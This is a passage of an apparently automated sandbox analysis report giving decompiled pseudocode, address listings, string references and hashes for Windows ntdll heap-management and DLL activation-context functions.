						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01161582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E010FD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                          0x010ca229
                                          0x010ca231
                                          0x010ca23f
                                          0x010ca242
                                          0x010ca244
                                          0x010ca24c
                                          0x010ca255
                                          0x010ca25a
                                          0x010ca25f
                                          0x01111c76
                                          0x01111c78
                                          0x01111c7e
                                          0x01111c7f
                                          0x01111c81
                                          0x01111c82
                                          0x01111c84
                                          0x01111c89
                                          0x01111c8b
                                          0x01111c9e
                                          0x01111c9e
                                          0x01111cab
                                          0x01111cb2
                                          0x00000000
                                          0x01111cb2
                                          0x01111c8d
                                          0x01111c92
                                          0x00000000
                                          0x00000000
                                          0x01111c94
                                          0x01111c98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01111c98
                                          0x010ca265
                                          0x010ca265
                                          0x010ca266
                                          0x010ca26f
                                          0x010ca270
                                          0x010ca276
                                          0x010ca277
                                          0x010ca279
                                          0x010ca27e
                                          0x010ca282
                                          0x01111db5
                                          0x01111dbb
                                          0x01111dc1
                                          0x01111dc5
                                          0x01111de4
                                          0x01111de9
                                          0x01111dc7
                                          0x01111ddc
                                          0x01111de1
                                          0x01111def
                                          0x01111df3
                                          0x01111df7
                                          0x01111dfe
                                          0x01111e06
                                          0x010ca302
                                          0x010ca308
                                          0x010ca308
                                          0x010ca288
                                          0x010ca28d
                                          0x010ca294
                                          0x01111cc1
                                          0x010ca29a
                                          0x010ca29a
                                          0x010ca29a
                                          0x010ca29f
                                          0x01111ccb
                                          0x01111cd1
                                          0x01111cd8
                                          0x01111cea
                                          0x01111cea
                                          0x01111cd8
                                          0x010ca2a9
                                          0x010ca2af
                                          0x010ca2bc
                                          0x01111cfd
                                          0x010ca2c2
                                          0x010ca2c2
                                          0x010ca2c2
                                          0x010ca2c7
                                          0x01111d07
                                          0x01111d0d
                                          0x01111d14
                                          0x01111d1f
                                          0x01111d21
                                          0x01111d2c
                                          0x01111d2c
                                          0x01111d2c
                                          0x01111d47
                                          0x01111d47
                                          0x01111d14
                                          0x010ca2cd
                                          0x010ca2d2
                                          0x010ca2d9
                                          0x01111d5a
                                          0x010ca2df
                                          0x010ca2df
                                          0x010ca2df
                                          0x010ca2e4
                                          0x01111d69
                                          0x01111d6b
                                          0x01111d76
                                          0x01111d76
                                          0x01111d76
                                          0x01111d91
                                          0x01111d91
                                          0x010ca2ea
                                          0x010ca2f0
                                          0x010ca2f5
                                          0x01111da8
                                          0x01111dad
                                          0x01111dad
                                          0x010ca2fd
                                          0x010ca300
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                          • API String ID: 2994545307-2586055223
                                          • Opcode ID: 84704c61d2a02fd194a0916fae66e7017901cf095be0ce844213ba194a26c9bb
                                          • Instruction ID: fb42bc27c360e01db14b5033b94abc2666e49380d7679763cb7f4496d8f3ba33
                                          • Opcode Fuzzy Hash: 84704c61d2a02fd194a0916fae66e7017901cf095be0ce844213ba194a26c9bb
                                          • Instruction Fuzzy Hash: 0B51F672205695AFE726EB6CC848F6FF7E9FB80B54F050468F6918B291E725D800CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D8E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E010D8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x119d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1198464; // 0x76690110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1195780 & 0x00000003) != 0) {
							E01125510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1195780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E010EB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1197984; // 0xb52b70
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1198464; // 0x76690110
					 *0x119b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E010D9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1195780 & 0x00000005) != 0) {
						_push(_t49);
						E01125510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                          0x010d8e0f
                                          0x010d8e16
                                          0x010d8e19
                                          0x010d8e1b
                                          0x010d8e21
                                          0x010d8e7f
                                          0x010d8e85
                                          0x01119354
                                          0x0111936c
                                          0x01119371
                                          0x0111937b
                                          0x01119381
                                          0x01119381
                                          0x0111937b
                                          0x010d8e9d
                                          0x010d8e9d
                                          0x010d8e29
                                          0x010d8e2c
                                          0x010d8e38
                                          0x010d8e3e
                                          0x010d8e43
                                          0x010d8eb5
                                          0x010d8eb9
                                          0x011192aa
                                          0x011192af
                                          0x011192e8
                                          0x011192e8
                                          0x011192af
                                          0x010d8eb9
                                          0x010d8e45
                                          0x010d8e53
                                          0x010d8e5b
                                          0x010d8e5f
                                          0x010d8e78
                                          0x010d8e78
                                          0x010d8e7d
                                          0x010d8ec3
                                          0x010d8ecd
                                          0x010d8ed2
                                          0x010d8ed2
                                          0x010d8ec5
                                          0x010d8ec5
                                          0x00000000
                                          0x010d8e7d
                                          0x010d8e67
                                          0x010d8ea4
                                          0x0111931a
                                          0x00000000
                                          0x00000000
                                          0x01119320
                                          0x010d8ea4
                                          0x010d8e70
                                          0x01119325
                                          0x01119340
                                          0x01119345
                                          0x01119345
                                          0x010d8e76
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Strings
                                          • LdrpFindDllActivationContext, xrefs: 01119331, 0111935D
                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 01119357
                                          • minkernel\ntdll\ldrsnap.c, xrefs: 0111933B, 01119367
                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0111932A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                          • API String ID: 0-3779518884
                                          • Opcode ID: 2086dc625f15f832bd7de047bd8f310bdeedac5dc95582ff0244501fbbd9d9c0
                                          • Instruction ID: f5d49e836462dab4c347f440913f8a755d2430e37b235ce25b77c30a2bf0f508
                                          • Opcode Fuzzy Hash: 2086dc625f15f832bd7de047bd8f310bdeedac5dc95582ff0244501fbbd9d9c0
                                          • Instruction Fuzzy Hash: 31412A31A003159FDBBAAA1CC889A79B6F5BB01718F06C5BBD9E457151E7709DC08FC1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011649A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                          • API String ID: 2994545307-336120773
                                          • Opcode ID: 344481eb1a967157b6187daba1f03765bc71081f7822a9c78a6a4c105445dfd5
                                          • Instruction ID: 5389c3431ac2beea7081d94029ace092e6057b1d54502c5da60fd80370ad0ddf
                                          • Opcode Fuzzy Hash: 344481eb1a967157b6187daba1f03765bc71081f7822a9c78a6a4c105445dfd5
                                          • Instruction Fuzzy Hash: C8311235200505FFD728DB99C889FABB7ECEF04620F154169F586CB641EB72E850CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C99BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E010C99BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0115FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0116A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E010FD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E010AB150();
										} else {
											E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E010AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1196378 = 1;
											asm("int3");
											 *0x1196378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E010CA229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E010CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E010CBC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0116A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E010CA229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E010CA309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E010FD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E010AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1196378 = 1;
									asm("int3");
									 *0x1196378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0115FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0116A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E010FD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E010AB150();
													} else {
														E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E010AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1196378 = 1;
														asm("int3");
														 *0x1196378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E010CA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E010CA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E010CBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0116A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E010FD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E010AB150();
													} else {
														E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E010AB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1196378 = 1;
														asm("int3");
														 *0x1196378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E010CA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E010CA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E010CBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E010CBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                          0x010c99ca
                                          0x010c99cc
                                          0x010c99df
                                          0x010c99e3
                                          0x010c99f8
                                          0x010c99fb
                                          0x010c99fb
                                          0x00000000
                                          0x010c9a48
                                          0x010c9a48
                                          0x010c9a4c
                                          0x010c9a51
                                          0x010c9a55
                                          0x010c9a61
                                          0x010c9a66
                                          0x010c9a68
                                          0x01111457
                                          0x0111145c
                                          0x0111145c
                                          0x010c9a68
                                          0x010c9a6e
                                          0x010c9a71
                                          0x010c9a74
                                          0x010c9a76
                                          0x01111466
                                          0x01111469
                                          0x01111469
                                          0x0111146c
                                          0x0111146e
                                          0x01111471
                                          0x01111474
                                          0x01111477
                                          0x01111479
                                          0x0111159c
                                          0x0111159c
                                          0x0111159d
                                          0x011115a6
                                          0x011115ab
                                          0x011115ab
                                          0x00000000
                                          0x011115ab
                                          0x0111147f
                                          0x01111481
                                          0x00000000
                                          0x00000000
                                          0x0111148a
                                          0x0111148d
                                          0x01111493
                                          0x01111495
                                          0x011114c0
                                          0x011114c0
                                          0x011114c3
                                          0x011114c6
                                          0x011114c8
                                          0x011114cb
                                          0x011114cf
                                          0x011114f2
                                          0x011114f2
                                          0x011114f5
                                          0x011114f8
                                          0x01111501
                                          0x01111508
                                          0x0111150b
                                          0x0111150e
                                          0x01111510
                                          0x01111513
                                          0x01111515
                                          0x01111515
                                          0x01111518
                                          0x01111518
                                          0x01111513
                                          0x01111521
                                          0x01111525
                                          0x0111152a
                                          0x0111152d
                                          0x01111530
                                          0x01111532
                                          0x01111539
                                          0x0111153d
                                          0x0111155d
                                          0x01111562
                                          0x0111153f
                                          0x01111555
                                          0x0111155a
                                          0x01111570
                                          0x01111577
                                          0x0111157c
                                          0x01111582
                                          0x01111585
                                          0x01111589
                                          0x0111158b
                                          0x01111592
                                          0x01111593
                                          0x01111593
                                          0x01111589
                                          0x01111530
                                          0x00000000
                                          0x011114f8
                                          0x011114d5
                                          0x011114da
                                          0x011114dc
                                          0x00000000
                                          0x011114de
                                          0x011114e8
                                          0x00000000
                                          0x011114e8
                                          0x01111497
                                          0x01111497
                                          0x011114a4
                                          0x011114a4
                                          0x011114a7
                                          0x011114a9
                                          0x011114ab
                                          0x011114ab
                                          0x0111149c
                                          0x0111149e
                                          0x011114a0
                                          0x011114b0
                                          0x011114b0
                                          0x00000000
                                          0x011114a2
                                          0x011114a2
                                          0x00000000
                                          0x011114a2
                                          0x011114a0
                                          0x011114b3
                                          0x011114bb
                                          0x00000000
                                          0x011114bb
                                          0x01111495
                                          0x010c9a7c
